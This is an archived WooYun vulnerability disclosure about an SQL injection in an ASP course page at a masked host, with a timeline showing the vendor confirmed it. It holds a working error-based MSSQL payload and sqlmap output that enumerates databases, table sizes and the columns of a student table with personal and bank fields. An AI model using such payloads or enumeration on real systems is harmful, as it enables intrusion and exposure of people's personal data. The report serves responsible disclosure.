乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
注入点:http://**.**.**.**/cc2/courseview.asp?classnum=CC10326
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:---Parameter: classnum (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: classnum=CC10326' AND 7817=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7817=7817) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'Uwnu'='Uwnu---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005current database: 'ec2'current user is DBA: Falseavailable databases [21]:[*] account[*] AdventureWorks[*] AdventureWorksDW[*] DB_hr[*] DB_Question[*] ec2[*] ec3[*] labor[*] labor_coop[*] MagicDocDB[*] master[*] model[*] msdb[*] ppactivity[*] prothrows[*] tempdb[*] texam_bicy[*] twcb[*] wealthy[*] wealthy1[*] young_plan
数据库太多了,随便看几个吧:
Database: ec2+---------------------------+---------+| Table | Entries |+---------------------------+---------+| dbo.regist_detail | 197101 || dbo.regist | 178810 || dbo.pay_d | 177568 || dbo.Vregnum | 161700 || dbo.Ucard | 122185 || dbo.course_report | 108840 || dbo.student | 79289 || dbo.Rd_card | 66597 || dbo.pay_m | 52283 || dbo.course | 37117 || dbo.web_student | 34592 || dbo.Add3 | 27744 || dbo.sys_record | 24597 || dbo.sortcourse | 23294 || dbo.Ucardprint | 16849 || dbo.web_regist | 16189 || dbo.s01_reader | 12430 || dbo.web_regist_detail | 11633 || dbo.deposit | 5043 || dbo.customer | 4455 || dbo.salary | 4425 || dbo.teacher | 4312 || dbo.teacher_bak | 3217 || dbo.s02_reader | 2176 || dbo.lack | 2139 || dbo.class | 1827 || dbo.slabor_reader | 1418 || dbo.question | 1259 || dbo.web_regist_detail_tqc | 1092 || dbo.S02_sentrecord | 917 || dbo.Rd_card2 | 849 || dbo.web_student_tqc | 818 || dbo.web_regist_tqc | 704 || dbo.Tick_seq | 532 || dbo.class_kind | 484 || dbo.cmail | 368 || dbo.Add2 | 366 || dbo.member | 336 || dbo.Assign_work | 243 || dbo.s01_enews | 166 || dbo.apply | 82 || dbo.department | 56 || dbo.sysform | 54 || dbo.place_base | 27 || dbo.Add1 | 26 || dbo.meet_company | 23 || dbo.FT_User | 20 || dbo.users | 17 || dbo.do_unit | 16 || dbo.s02_enews | 15 || dbo.agio | 13 || dbo.class_board | 11 || dbo.charge_set | 6 || dbo.dep | 5 || dbo.grade | 3 || dbo.lease_data | 2 || dbo.usergroup | 2 || dbo.app_data | 1 || dbo.counters | 1 || dbo.inschool | 1 || dbo.System | 1 || dbo.ucard_ad | 1 || dbo.web_counters | 1 |+---------------------------+---------+
Database: ec2Table: student[34 columns]+-------------+---------+| Column | Type |+-------------+---------+| academic | varchar || add_c | varchar || b_b_call | varchar || bank | varchar || bankid | varchar || birthday | varchar || cell_call | varchar || company | varchar || company_add | varchar || company_zip | varchar || dept_id | varchar || duty | varchar || email | varchar || fax | varchar || finish | varchar || grade_date | varchar || how1 | bit || how2 | bit || how3 | bit || how4 | bit || id | varchar || keyin | varchar || memo | varchar || name | varchar || s_date | varchar || s_duty | varchar || s_level | varchar || s_number | varchar || school | varchar || seq | varchar || slevel | int || tel_h | varchar || tel_o | varchar || zip | varchar |+-------------+---------+
看点信息:
危害等级:高
漏洞Rank:16
确认时间:2015-12-14 23:29
感謝通報
暂无